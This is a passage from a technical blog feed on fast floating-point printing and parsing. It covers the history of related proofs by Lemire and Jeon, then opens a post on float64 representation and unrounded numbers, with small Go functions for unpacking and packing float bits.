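As a sanity check on those outputs (a brute-force sketch of mine, not from either paper), scanning <code>x</code> from 1 to <code>M</code> directly, ignoring both the trivial <code>x = 0</code> and any slack in the upper limit, gives the same answer as the corrected algorithm:
<pre class='language-go'>package main

import "fmt"

// minmaxBrute scans x = 1..M and returns the minimum and maximum of x*a mod b.
func minmaxBrute(a, b, M uint64) (min, max uint64) {
	min = b
	for x := uint64(1); x <= M; x++ {
		r := x * a % b
		if r < min {
			min = r
		}
		if r > max {
			max = r
		}
	}
	return min, max
}

func main() {
	fmt.Println(minmaxBrute(3, 8, 7)) // 1 7
}
</pre>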
<a class=anchor href="#lemire_2023"><h3 id="lemire_2023">Lemire 2023</h3></a>
<p>
→ Daniel Lemire, “<a href="https://arxiv.org/abs/2101.11408">Number Parsing at a Gigabyte per Second</a>”, <i>Software—Practice and Experience</i>, 2021. <br>
→ Noble Mushtak and Daniel Lemire, “<a href="https://arxiv.org/pdf/2212.06644">Fast Number Parsing Without Fallback</a>”, <i>Software—Practice and Experience</i>, 2023.
<p>
In March 2020, Lemire published code for a fast floating-point parser
for up to 19-digit decimal inputs
using a 128-bit <math><MI>𝑝𝑚</MI></math>, based on an idea by Michael Eisel.
Nigel Tao <a href="https://nigeltao.github.io/blog/2020/eisel-lemire.html">blogged about it in 2020</a>
and Lemire published the algorithm in <i>Software—Practice and Experience</i> in 2021.
<p>
As published in 2021, Lemire’s algorithm uses <math><mrow><MI>𝑝𝑚</MI><mo>=</mo><mrow><mo stretchy=false>⌊</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>⌋</mo></mrow></mrow></math> and
therefore checks for <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>−</mo><mn>1</mn></mrow></msup></mrow></math> as a sign of possible inexactness.
Upon finding that condition, the algorithm falls back to a bignum-based
implementation.
<p>
In 2023, Mushtak and Lemire published a short but dense followup note proving that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>−</mo><mn>1</mn></mrow></msup></mrow></math>
is impossible, and therefore the fallback check is unnecessary and can be removed.
They address only the specific case of a 64-bit input and 73-bit middle,
making the usual continued fraction arguments to bound the error for non-exact results.
<p>
Empirically, Mushtak and Lemire’s computational proof does not generalize to other sizes.
I <a href="https://github.com/fastfloat/fast_float/blob/main/script/mushtak_lemire.py">downloaded their Python script</a> and changed it from analyzing <math><mrow><mi>N</mi><mo>=</mo><mi>m</mi><mo>+</mo><mi>b</mi><mo>=</mo><mn>137</mn></mrow></math>
to analyze other sizes and observed both false positives and false negatives.
I believe the false negatives are from omitting semiconvergents
(unnecessary for <math><mrow><mi>N</mi><mo>=</mo><mn>137</mn></mrow></math>, as proved in their Theorem 2)
and the false positives are from the approach not limiting <math><mi>x</mi></math>
to the range <math><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>−</MO><mn>1</mn></mrow></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo>−</mo><mn>1</mn><mo stretchy=false>]</mo></mrow></math>.
<a class=anchor href="#jeon_2024"><h3 id="jeon_2024">Jeon 2024</h3></a>
<p>
→ Junekey Jeon, “<a href="https://raw.githubusercontent.com/jk-jeon/dragonbox/master/other_files/Dragonbox.pdf">Dragonbox: A New Floating-Point Binary-to-Decimal Conversion Algorithm</a>”, published online, 2024.
<p>
In 2024, Jeon published Dragonbox, a successor to Grisu-Exact.
Jeon changed from using the corrected <code>minmax_euclid</code> implementation
to using a proof based on continued fractions.
Algorithm C.14 (“Finding best rational approximations from below and above”)
is essentially equivalent to Paxson’s algorithms.
Like in Ryū and Grisu-Exact, the proof
only considers the truncated computation <math><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow></math>
and computes an exactness bit separately.
<a class=anchor href="#conclusion"><h2 id="conclusion">Conclusion</h2></a>
<p>
This post proved that <math><mtext>Scale</mtext></math> can be implemented
correctly using a fast approximation
that involves only a few word-sized multiplications and shifts.
For printing and parsing of float64 values, computing the top
128 bits of a 64×128-bit multiplication is sufficient.
<p>
The fact that float64 conversions require only 128-bit precision
has been known since at least Hanson’s work at Apple in the mid-1990s,
but that work was not widely known and did not include a proof.
Paxson used an exact computational worst case analysis of modular multiplications
to find difficult conversion cases; he did not
bound the precision needed for parsing and printing.
In contrast, Hack, Giulietti and Nadhezin, Adams, Mushtak and Lemire, and Jeon
all derived ways to bound the precision needed for parsing or printing,
but none of them used an exact computational worst case analysis
that generalizes to arbitrary floating-point formats,
and none recognized the commonality between parsing and printing.
<p>
The approach in this post, based on Paxson’s general approach
and built upon a modular analysis primitive by David Wärn,
is the first exact analysis that generalizes to arbitrary formats
and handles both parsing and printing.
<p>
In this post, I have tried to give credit where credit is due
and to represent others’ work fairly and accurately.
I would be extremely grateful to receive additions, corrections,
or suggestions at <a href="mailto:rsc@swtch.com">rsc@swtch.com</a>.
Floating-Point Printing and Parsing Can Be Simple And Fasttag:research.swtch.com,2012:research.swtch.com/fp2026-01-19T16:45:00-05:002026-01-19T16:47:00-05:00Fast and simple conversion between floating-point and decimal. (Floating Point Formatting, Part 3)<style>
@media print {
table img[src*="-scat"] {
width: 432px;
height: auto;
}
table img[src*="-cdf"] {
width: 288px;
height: auto;
}
}
</style>
<style>
.main-wide td {
padding-left: 0 !important;
padding-right: 0 !important;
padding-top: 0 !important;
padding-bottom: 0 !important;
}
.main-wide td img { padding: 0; }
.main-wide table { border: none !important; }
.main-wide tr.th { border: none !important; }
</style>
<a class=anchor href="#introduction"><h2 id="introduction">Introduction</h2></a>
<p>
A floating point number <math><mi>f</mi></math> has the form <math><mrow><mi>f</mi><mo>=</mo><mi>m</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math>
where <math><mi>m</mi></math> is called the <i>mantissa</i>
and <math><mi>e</mi></math> is a signed integer <i>exponent</i>.
We like to read numbers scaled by powers of ten,
not two, so computers need algorithms to convert binary floating-point
to and from decimal text.
My 2011 post “<a href="https://research.swtch.com/ftoa">Floating Point to Decimal Conversion is Easy</a>”
argued that these conversions can be simple as long as you
don’t care about them being fast.
But I was wrong: fast converters can be simple too,
and this post shows how.
<p>
The main idea of this post is to implement <i>fast unrounded scaling</i>,
which computes an approximation to <math><mrow><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>,
often in a single 64-bit multiplication.
On that foundation
we can build nearly trivial printing and parsing algorithms that run very fast.
In fact, the printing algorithms
run faster than all other known algorithms,
including
Dragon4 [<a class=footref id='fnref-30' href='#fn-30'>30</a>],
Grisu3 [<a class=footref id='fnref-23' href='#fn-23'>23</a>],
Errol3 [<a class=footref id='fnref-4' href='#fn-4'>4</a>],
Ryū [<a class=footref id='fnref-2' href='#fn-2'>2</a>],
Ryū Printf [<a class=footref id='fnref-3' href='#fn-3'>3</a>],
Schubfach [<a class=footref id='fnref-12' href='#fn-12'>12</a>],
and Dragonbox [<a class=footref id='fnref-17' href='#fn-17'>17</a>],
and the parsing algorithm runs faster than
the Eisel-Lemire algorithm [<a class=footref id='fnref-22' href='#fn-22'>22</a>].
This post presents both the algorithms and a concrete implementation in Go.
I expect some form of this Go code to ship in Go 1.27 (scheduled for August 2026).
<p>
This post is rather long—far longer than the implementations!—so here is a brief overview of the sections
for easier navigation and understanding where we’re headed.
<ul>
<li>
“<a href="#numbers">Fixed-Point and Floating-Point Numbers</a>”
briefly reviews fixed-point and floating-point numbers,
establishing some terminology and concepts needed for the rest of the post.
<li>
“<a href="#unround">Unrounded Numbers</a>” introduces the idea of unrounded numbers,
inspired by the IEEE754 floating-point extended format.
<li>
“<a href="#scale">Unrounded Scaling</a>” defines the unrounded scaling primitive.
<li>
“<a href="#fixedwidth">Fixed-Width Printing</a>” formats floating-point numbers
with a given (fixed) number of decimal digits, at most 18.
<li>
“<a href="#parsing">Parsing Decimals</a>” parses decimal numbers of
at most 19 digits into floating-point numbers.
<li>
“<a href="#short">Shortest-Width Printing</a>” formats floating-point numbers
using the shortest representation that parses back to the original number.
<li>
“<a href="#fast">Fast Unrounded Scaling</a>” reveals the
short but subtle implementation of fast unrounded scaling
that enables those simple algorithms.
<li>
“<a href="#proof">Sketch of a Proof of Fast Scaling</a>” briefly sketches the proof
that the fast unrounded scaling algorithm is correct.
A companion post, “<a href="fp-proof">Fast Unrounded Scaling: Proof by Ivy</a>”
provides the full details.
<li>
“<a href="#omit">Omit Needless Multiplications</a>” uses a key idea from the proof
to optimize the fast unrounded scaling implementation further,
reducing it to a single 64-bit multiplication in many cases.
<li>
“<a href="#perf">Performance</a>” compares the performance of the
implementation of these algorithms against earlier ones.
<li>
“<a href="#history">History and Related Work</a>” examines the history of
solutions to the floating-point printing and parsing problems
and traces the origins of the specific ideas used in this
post’s algorithms.</ul>
<p>
For the last decade, there has been a new algorithm for floating-point printing and parsing
every few years.
Given the simplicity and speed of the algorithms in this post
and the increasingly small deltas between successive algorithms,
perhaps we are nearing an optimal solution.
<a class=anchor href="#numbers"><h2 id="numbers">Fixed-Point and Floating-Point Numbers</h2></a>
<p>
Fixed-point numbers have the form <math><mrow><mi>f</mi><mo>=</mo><mi>m</mi><mo>·</mo><mi>B</mi><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math> for an integer mantissa <math><mi>m</mi></math>, constant base <math><mi>B</mi></math>, and constant (fixed) exponent <math><mi>e</mi></math>.
We can create fixed-point representations
in any base, but the most common are base 2 (for computers)
and base 10 (for people).
This diagram shows fixed-point numbers at various scales
that can represent numbers between 0 and 1:
<p>
<img name="fpfmt-ruler1" class="center pad" width=410 height=230 src="fpfmt-ruler1.svg">
<p>
Using a smaller scaling factor increases precision
at the cost of larger mantissas.
When representing very large numbers, we can use
larger scaling factors to reduce the mantissa size.
For example, here are various representations of
numbers around one billion:
<p>
<img name="fpfmt-ruler2" class="center pad" width=400 height=210 src="fpfmt-ruler2.svg">
<p>
Floating-point numbers are the same as base-2 fixed-point numbers except that
<math><mi>e</mi></math> changes with
the overall size of the number.
Small numbers use very small scaling factors
while large numbers use large scaling factors,
aiming to keep the mantissas a constant length.
For float64s, the exponent <math><mi>e</mi></math> is chosen so that the mantissa <math><mi>m</mi></math> has 53 bits,
meaning <math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup><mo stretchy=false>)</mo></mrow></math>.
For example, for numbers in <math><mrow><mo stretchy=false>[</mo><mn>½</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></math>, float64s use <math><mrow><mi>e</mi><mo>=</mo><MO form='prefix'>−</MO><mn>53</mn></mrow></math>;
for numbers in <math><mrow><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><mo stretchy=false>)</mo></mrow></math> they use <math><mrow><mi>e</mi><mo>=</mo><MO form='prefix'>−</MO><mn>52</mn></mrow></math>;
and so on.
<p>
[The notation <math><mrow><mo stretchy=false>[</mo><mi>a</mi><mo>,</mo><mi>b</mi><mo stretchy=false>)</mo></mrow></math> is a <i>half-open interval</i>, which includes <math><mi>a</mi></math> but not <math><mi>b</mi></math>.
In contrast, the <i>closed interval</i> <math><mrow><mo stretchy=false>[</mo><mi>a</mi><mo>,</mo><mi>b</mi><mo stretchy=false>]</mo></mrow></math> includes both <math><mi>a</mi></math> and <math><mi>b</mi></math>.
We write <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><mi>a</mi><mo>,</mo><mi>b</mi><mo stretchy=false>)</mo></mrow></math> or <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><mi>a</mi><mo>,</mo><mi>b</mi><mo stretchy=false>]</mo></mrow></math> to say that <math><mi>x</mi></math> is in that interval.
Using this notation, <math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup><mo stretchy=false>)</mo></mrow></math> means <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>≤</mo><mi>m</mi><mo><</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup></mrow></math>.]
<p>
In addition to limiting the mantissa size, we must also limit the exponent,
to keep the overall number a fixed size.
For float64s, assuming <math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup><mo stretchy=false>)</mo></mrow></math>, the exponent <math><mrow><mi>e</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1074</mn><mo>,</mo><mn>971</mn><mo stretchy=false>]</mo></mrow></math>.
<p>
A float64 consists of 1 sign bit, 11 exponent bits, and 52 mantissa bits.
The <i>normal</i> 11-bit exponent encodings <code>0x001</code> through <code>0x7fe</code> denote <math><mrow><mi>e</mi><mo>=</mo><MO form='prefix'>−</MO><mn>1074</mn></mrow></math> through <math><mrow><mi>e</mi><mo>=</mo><mn>971</mn></mrow></math>.
For those, the mantissa <math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup><mo stretchy=false>)</mo></mrow></math>,
and it is encoded into only 52 bits by omitting the leading 1 bit.
The special exponent encoding <code>0x7ff</code> is used for infinity and not-a-number.
That leaves the encoding <code>0x000</code>, which is also special.
It denotes <math><mrow><mi>e</mi><mo>=</mo><MO form='prefix'>−</MO><mn>1074</mn></mrow></math> (like <code>0x001</code> does)
but with mantissas <math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo stretchy=false>)</mo></mrow></math> without an implicit leading 1.
These <i>subnormals</i> or <i>denormalized numbers</i> [<a class=footref id='fnref-8' href='#fn-8'>8</a>]
continue the fixed-point <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>1074</mn></mrow></msup></mrow></math> scale down to zero,
which ends up encoded (not coincidentally) as 64 zero bits.
<p>
Other definitions of floating point numbers use different interpretations.
For example, the IEEE754 standard uses
<math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><mo stretchy=false>)</mo></mrow></math> with <math><mrow><mi>e</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1023</mn><mo>,</mo><mn>1023</mn><mo stretchy=false>]</mo></mrow></math>,
while the C standard library <i>frexp</i> function uses <math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>½</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></math> with <math><mrow><mi>e</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1022</mn><mo>,</mo><mn>1024</mn><mo stretchy=false>]</mo></mrow></math>.
Both of these choices make <math><mi>m</mi></math> itself a fixed-point number instead of an integer.
Our integer definition lets us use integer math.
These interpretations are all equivalent and differ only by a constant added to <math><mi>e</mi></math>.
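<p>
As a small illustration (mine, using Go’s <code>math.Frexp</code> for the <i>frexp</i> convention), here is 0.75 under all three conventions:
<pre class='language-go'>package main

import (
	"fmt"
	"math"
)

func main() {
	f := 0.75
	fm, fe := math.Frexp(f)     // frexp convention: m ∈ [½, 1)
	fmt.Println(fm, fe)         // 0.75 0
	fmt.Println(fm*2, fe-1)     // 1.5 -1  (IEEE754 convention: m ∈ [1, 2))
	m := uint64(fm * (1 << 53)) // integer convention: m ∈ [2^52, 2^53)
	fmt.Println(m, fe-53)       // 6755399441055744 -53
	fmt.Println(math.Ldexp(float64(m), fe-53) == f) // true
}
</pre>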
<p>
This description of float64s applies to float32s as well, but with different constants. This table summarizes the two encodings:<style>
#_table1 td:nth-child(2) { text-align: center }
#_table1 td:nth-child(3) { text-align: center }
</style>
<table class=md id=_table1>
<tr class=th><th></th><th>float32</th><th>float64</th></tr>
<tr><td>sign bits</td><td>1</td><td>1</td></tr>
<tr><td>encoded mantissa bits</td><td>23</td><td>52</td></tr>
<tr><td>encoded exponent bits</td><td>8</td><td>11</td></tr>
<tr><td>exponent range for <math><mrow><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><mo stretchy=false>)</mo></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>127</mn><mo>,</mo><mn>127</mn><mo stretchy=false>]</mo></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1023</mn><mo>,</mo><mn>1023</mn><mo stretchy=false>]</mo></mrow></math></td></tr>
<tr><td>exponent range for integer <math><mi>m</mi></math></td><td><math><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>150</mn><mo>,</mo><mn>104</mn><mo stretchy=false>]</mo></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1074</mn><mo>,</mo><mn>971</mn><mo stretchy=false>]</mo></mrow></math></td></tr>
<tr><td>normal numbers</td><td><math><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>23</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>24</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>150</mn><mo>,</mo><mn>104</mn><mo stretchy=false>]</mo></mrow></msup></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>53</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1074</mn><mo>,</mo><mn>971</mn><mo stretchy=false>]</mo></mrow></msup></mrow></math></td></tr>
<tr><td>subnormal numbers</td><td><math><mrow><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>23</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>150</mn></mrow></msup></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>1074</mn></mrow></msup></mrow></math></td></tr>
<tr><td>exponent range for 64-bit <math><mi>m</mi></math></td><td><math><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>190</mn><mo>,</mo><mn>64</mn><mo stretchy=false>]</mo></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1085</mn><mo>,</mo><mn>960</mn><mo stretchy=false>]</mo></mrow></math></td></tr>
<tr><td>normal numbers</td><td><math><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>190</mn><mo>,</mo><mn>64</mn><mo stretchy=false>]</mo></mrow></msup></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1085</mn><mo>,</mo><mn>960</mn><mo stretchy=false>]</mo></mrow></msup></mrow></math></td></tr>
<tr><td>subnormal numbers</td><td><math><mrow><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>190</mn></mrow></msup></mrow></math></td><td><math><mrow><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>1085</mn></mrow></msup></mrow></math></td></tr>
</table>
<p>
To convert a float64 to its bits, we use Go’s <a href="https://go.dev/pkg/math/#Float64bits"><code>math.Float64bits</code></a>.
<div class=showcode><pre><span class=showcode-comment>// unpack64 returns m, e such that f = m * 2**e.</span>
<span class=showcode-comment>// The caller is expected to have handled 0, NaN, and ±Inf already.</span>
<span class=showcode-comment>// To unpack a float32 f, use unpack64(float64(f)).</span>
func unpack64(f float64) (uint64, int) {
const shift = 64 - 53
const minExp = -(1074 + shift)
b := math.Float64bits(f)
m := 1<<63 | (b&(1<<52-1))<<shift
e := int((b >> 52) & (1<<shift - 1))
if e == 0 {
m &^= 1 << 63
e = minExp
s := 64 - bits.Len64(m)
return m << s, e - s
}
return m, (e - 1) + minExp
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L23-L38">fpfmt/fpfmt.go:23,38</a></div><div class=showcode-end></div>
<p>
To convert back, we use Go’s <a href="https://go.dev/pkg/math/#Float64frombits"><code>math.Float64frombits</code></a>.
<div class=showcode><pre><span class=showcode-comment>// pack64 takes m, e and returns f = m * 2**e.</span>
<span class=showcode-comment>// It assumes the caller has provided a 53-bit mantissa m</span>
<span class=showcode-comment>// and an exponent that is in range for the mantissa.</span>
func pack64(m uint64, e int) float64 {
if m&(1<<52) == 0 {
return math.Float64frombits(m)
}
return math.Float64frombits(m&^(1<<52) | uint64(1075+e)<<52)
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L41-L48">fpfmt/fpfmt.go:41,48</a></div><div class=showcode-end></div>
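<p>
Here is a quick usage sketch (my example, assuming the <code>unpack64</code> and <code>pack64</code> listings above are in the same package). The <code>m>>11</code> and <code>e+11</code> adjust between the 64-bit mantissa that <code>unpack64</code> returns and the 53-bit mantissa that <code>pack64</code> expects; the round trip works for normal values like these:
<pre class='language-go'>package main

import "fmt"

func main() {
	for _, f := range []float64{0.75, 1.0, 1e23} {
		m, e := unpack64(f)
		fmt.Printf("%v = %#x * 2**%d\n", f, m, e)
		fmt.Println(pack64(m>>11, e+11) == f) // true
	}
}
</pre>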
<p>
[Other presentations use “fraction” and “significand” instead of “mantissa”.
This post uses mantissa for consistency with my 2011 post
and because I generally agree with Agatha Mallett’s excellent
“<a href="https://geometrian.com/projects/blog/in-defense-of-mantissa.html">In Defense of ‘Mantissa’</a>”.]
<a class=anchor href="#unrounded_numbers"><h2 id="unrounded_numbers">Unrounded Numbers</h2></a>
<p>
Floating-point operations are defined as if computed exactly to infinite precision
and then rounded to the nearest actual floating-point number,
breaking ties by rounding to an even mantissa.
Of course, real implementations don’t use infinite precision;
they only keep enough precision to round properly.
We will use the same idea.
In our algorithms, we want the scaling operation to eventually evaluate to an integer,
but we want to give the caller control over the rounding step.
So instead of returning an integer, we will return an <i>unrounded number</i>,
which contains all the information needed to round it in a variety of ways.
<p>
The unrounded form of any real number <math><mi>x</mi></math>, which we will write as <math><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow></math>,
is the truncated integer part of <math><mi>x</mi></math> followed by two more bits.
Those bits indicate (1) whether the fractional part of <math><mi>x</mi></math> was at least ½, and (2) whether the fractional part was not exactly 0 or ½.
If you think of <math><mi>x</mi></math> as a real number written in binary, the first extra bit is the bit immediately after the “binary point”—the bit that represents <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>1</mn></mrow></msup></mrow></math>, aka the ½ bit—and the second extra bit is the OR of all the bits after the ½ bit.
<p>
This definition applies even to numbers that require an infinite binary representation.
For example, just as 1/3 requires an infinite decimal representation ‘<math><mrow><mn>0.333</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /></mrow></math>’,
1.6 requires an infinite binary representation ‘<math><mrow><mn>1.1001100110011</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /></mrow></math>’.
The unrounded version <math><mrow><mtext>⟨</mtext><mn>1.6</mn><mtext>⟩</mtext></mrow></math> is finite: ‘<math><mn>1.11</mn></math>’.
But instead of reading unrounded numbers in binary,
let’s print <math><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow></math> as <math><mrow><mtext>‘</mtext><mtext><i>n</i></mtext><mn>.</mn><mtext><i>hs</i></mtext><mtext>’</mtext></mrow></math> where <math><mtext><i>n</i></mtext></math> is the integer part <math><mrow><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow><MO>>></MO><mn>2</mn></mrow></math>,
<math><mtext><i>h</i></mtext></math> is 0 or 5, and <math><mtext><i>s</i></mtext></math> is ‘+’ when the second bit is 1.
Then <math><mrow><mtext>⟨</mtext><mn>1.6</mn><mtext>⟩</mtext></mrow></math> is written ‘<math><mrow><mn>1.5</mn><mtext>+</mtext></mrow></math>’.<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mi>x</mi><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mn>4</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><MO>|</MO><mo stretchy=false>(</mo><mn>4</mn><mi>x</mi><mo>≠</mo><mrow><mo stretchy=false>⌊</mo><mn>4</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>6</mn><mspace width='0.166em' /><mtext>exactly⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>24</mn><mo>=</mo><mtext>‘</mtext><mn>6.0</mn><mtext>’</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>6.000001</mn><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>25</mn><mo>=</mo><mtext>‘</mtext><mn>6.0</mn><mtext>+’</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>6.499999</mn><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>25</mn><mo>=</mo><mtext>‘</mtext><mn>6.0</mn><mtext>+’</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>6.5</mn><mspace width='0.166em' /><mtext>exactly⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>26</mn><mo>=</mo><mtext>‘</mtext><mn>6.5</mn><mtext>’</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>6.500001</mn><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>27</mn><mo>=</mo><mtext>‘</mtext><mn>6.5</mn><mtext>+’</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>⟨</mtext><mn>6.999999</mn><mtext>⟩</mtext></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>27</mn><mo>=</mo><mtext>‘</mtext><mn>6.5</mn><mtext>+’</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: 